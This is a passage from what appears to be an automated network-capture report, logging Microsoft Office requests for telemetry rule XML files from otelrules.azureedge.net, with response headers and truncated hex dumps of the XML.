                                                                                                                                                                          2024-11-23 18:02:21 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          130192.168.2.54993013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:21 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:21 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                          ETag: "0x8DC582BEA414B16"
                                                                                                                                                                          x-ms-request-id: 1aa9c07b-201e-0096-3276-3bace6000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180221Z-174c587ffdf89smkhC1TEB697s000000038000000000p9kv
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:21 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          131192.168.2.54993213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:21 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:21 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:21 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                          ETag: "0x8DC582BEB256F43"
                                                                                                                                                                          x-ms-request-id: 1a99a412-f01e-0099-613c-3c9171000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180221Z-174c587ffdfx984chC1TEB676g000000038g00000000c6v4
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:21 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          132192.168.2.54993513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:23 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:23 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                          ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                          x-ms-request-id: 91a34af8-001e-0028-211e-3dc49f000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180223Z-178bfbc474btrnf9hC1NYCb80g00000004z0000000009usn
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:23 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          133192.168.2.54993913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:23 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:23 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1425
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                          ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                          x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180223Z-174c587ffdftv9hphC1TEBm29w000000034000000000n8mf
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:23 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          134192.168.2.54993613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:23 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:23 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                          ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                          x-ms-request-id: 4f172bc4-201e-006e-1d27-3dbbe3000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180223Z-15b8b599d88z9sc7hC1TEBkr4w00000003cg00000000c3cb
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:23 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          135192.168.2.54993713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:23 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:23 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:23 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1399
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                          ETag: "0x8DC582BE976026E"
                                                                                                                                                                          x-ms-request-id: 0cceccde-a01e-006f-2615-3d13cd000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180223Z-178bfbc474bxkclvhC1NYC69g400000004n000000000kn8w
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:23 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          136192.168.2.54993813.107.246.634436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:23 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:23 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                          ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                          x-ms-request-id: a1d7de20-e01e-0051-6948-3c84b2000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180223Z-178bfbc474bpscmfhC1NYCfc2c00000003a000000000m4h8
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:23 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          137192.168.2.54994113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:25 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:25 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1388
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                          ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                          x-ms-request-id: ab1afa94-201e-0085-151a-3d34e3000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180225Z-178bfbc474bbbqrhhC1NYCvw7400000004zg000000007qaf
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:25 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          138192.168.2.54994413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:25 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:25 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1405
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                          ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                          x-ms-request-id: efd631bc-c01e-008d-6f47-3c2eec000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180225Z-15b8b599d8885prmhC1TEBsnkw00000003bg00000000cxb8
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:26 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          139192.168.2.54994513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:25 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:26 UTC494INHTTP/1.1 200 OK
